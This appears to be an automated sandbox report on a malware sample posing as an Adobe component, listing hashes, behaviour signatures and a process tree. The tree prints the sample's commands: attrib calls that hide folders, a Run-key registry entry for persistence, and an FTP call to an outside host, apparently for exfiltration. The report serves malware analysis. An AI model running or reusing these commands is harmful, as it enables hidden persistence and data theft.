Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
4s -
max time network
0s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
12/05/2024, 07:13
General
-
Target
38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
38e3b021f5cac0bc19bcdd76f6228771
-
SHA1
a6f23a56b70ef3ed327277bfec5eaf37d1505d89
-
SHA256
61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1
-
SHA512
cd9504a0b317b9efac96999ee3cd6c4869c97d222149216506c971c2de5144f03969885cbd925797f5fe687d10dcf86abfed7581515131b7051ab0e8b521f222
-
SSDEEP
98304:YkeMI+e05/Nm5OJumFPtQAcLFNKJ4LowZkh52h0mPtQAYTTN/:e0FNcmdEBNq4Loek7MQvN/
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 10 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 36 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\38e3b021f5cac0bc19bcdd76f6228771_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat" /quiet /norestart"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\"4⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"5⤵
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exeAdobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff6⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "sococsoE" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"6⤵
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all6⤵
- Gathers network information
-
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"6⤵
-
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exeadbr01.exe -f "011.011"7⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}1⤵
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
106B
MD54b474101cde9031b36105bbc0856b8f2
SHA178120dbc9bf88dd21b9de6c3012ce55c0a88efce
SHA25668ce4767cbde30b24cb244bc56ee938a6de52780fab7012d6c8f859b56b7f0a9
SHA5125ec24355ec7646157904f874da91186fdca3618a6d0034d9454abd4660cba9356ebb4616a19e97ce4d614f25fd70816ea76e3d569ad7a1623330466247330edb
-
Filesize
108KB
MD5daeaadb1e509ee3568645b725c7e5029
SHA12a463493e707e19d6c3444665f696f1e846483d4
SHA25662d34d5206dfc434c5a5713181adbec88ae8dbbf8faa7809edf763dab939aca7
SHA512f74156acaec9b7822fce94eb8115115b40edbb0e4fcabfdf22f6d1bda1c75bc182fe4b874cc0170fbe9414b3e05f593d3c4b71aedece65142ad62e87d2567038
-
Filesize
127KB
MD512af68f7d332050c34bdd79fcc8970c7
SHA1e99d9858b9dd3f21b22035193c888280ea54030b
SHA2569e3ef05a090bf38988d826efcfafeeac97433745d580faf5e7d162f2fd464d10
SHA512a500004e2b4a4a477a2680b45d72dec8190220a6bcb560c4a758c49c31996b0f950ff98a5edd29ca7215cffa4012a5e384d70953d9efd9b0504d2f90763e7946
-
Filesize
519B
MD5bd641fd8a89df0d37d06e70c1190385b
SHA1519d3f83a3bb15e17e7c39241d7e88224a9088d5
SHA256d71a091be2133db33293d57919a38198dbcd62f14ac4362a9b5813ad118c6fe0
SHA512160c1a27f3897eee99333b9a561d803d8f607d8ec6b0fcb36e09332e4fc0af590d3a5d0ea9481e2da9b0376afca01675fb1a8d41b3b194d60614e7122567ea06
-
Filesize
2.1MB
MD50fa6655f07e9fb4530581ed792b5d9a5
SHA1cfb92afe0c03243d94ee1a6c0dd6437f644fb5a2
SHA25613e048a6e41796b9038a55e634d54d2976dfa781fdaa051d635e4303e034536a
SHA512b8be270621176e54cfc98cfaa5d06afedab96a41ec19ab3078b62d85c76faf1f33d449ff26762758f2ac7a78abd7fb1dfb8ee52f6eda310921c76bd5c696618e
-
Filesize
2.1MB
MD52bdedc125e74a995b2409d5155b9ea15
SHA151f1a7b99c6fa5cab61395ef5ce4b98c37648407
SHA256d36b2721aa9a44391ba00d3533906cc481e2e67fbc8169409631614b38171a0d
SHA51222fd2a64cba4efe97c9d661017cff3e4143017e7e0feb75e8c84cf180143616d9d5c6a746914c85e45c0d9e0d87b37d9b4663593e94e2238e8f4ad86e64e5998
-
Filesize
205B
MD54a7b39c1281e958c383f4500c3cceb42
SHA1d374728df66cbcf862ac1dee320c4347eeba3fd3
SHA25676a5096de7785bd0e16b2141ce23be096a0fdf687361a1b9cc7e2fc078693c07
SHA5123d64ae760fc89743c4c71f445239c2e10b58b829b79bc28fc66e7bcb6d5f0eed59d1ebce6497586648885f7c5e190caafff167c2e146228783bfae1f7b3f30e7
-
Filesize
923B
MD57b1fb7ccb83e2be074c8eb5afd7e3675
SHA189eefff900c60269078d12f5495c4838ccda62e0
SHA256742ef36cbe95b5528c13e001c5040b75bf6aef22299731864318095e87bc4cb4
SHA512a4be580f5c07c7e1d0171ffc2990cf1dd838ca77d7584a3d70bba62b2276bca899d4af22fd0a28dd284c7ec28b1223f551a0ad040cf89d92aa34aa2fb1196eb0
-
Filesize
1KB
MD5a0eda0c5e3684e57fcd2f68a298b1446
SHA139e10699ae54cff7bdc4887e54f44f0ac8ced2de
SHA256b063723077544ae58431e6d6d846e95164548180bc829d3d06bd0211a33d47e2
SHA5125bde11ed902768662bf0cdd3a9f96d7d7b3c0d67ced5b29e9aa15b1b52120be1762b279a1a8888f8ba866873c00949d1f08d586aa50224f30391ae9b5181f168
-
Filesize
548B
MD5211f29b36069c5d74bb2fc624e3b750e
SHA14dde779a3951aae084e147da8f7298d316bb5ab5
SHA256fd80fc307f7ddddb874a38d249d14fcc9fa0ea7add12c37cc49c4337df42eb8d
SHA512ea5fdef56c58a6afbb7f04a1cb5c24054175cf7eea87e636488d4861798b95d2e63378e18c3c5afa03231fab3a15fe674f4d1d4f017dffbe0bc8b4f7836d87be
-
Filesize
107B
MD5d18b3077b533ad3c357a5eb91b580fdf
SHA167a818c98c35dfc03a5218c4920241b1e8c57245
SHA2560996a6841a0d31a6e1051924d6dc3be6588f7297b8c23d6e08d6461c87f1d0ad
SHA5126f6e0acc83d13ebbff0e8cbde53e03704bb4b2da27a18222475a7c366e51ad9cb200e562ed18dc8fc8491af306509af16d4b2eab57fe784aaae16f9a0ed84db5
-
Filesize
280KB
-
Filesize
280KB
-
Filesize
2.9MB
-
Filesize
2.9MB
-
Filesize
280KB
-
Filesize
2.9MB
-
Filesize
8KB
-
Filesize
2.9MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.9MB
-
Filesize
2.9MB
-
Filesize
2.9MB
-
Filesize
2.0MB
-
Filesize
1024KB
-
Filesize
1024KB
-
Filesize
8KB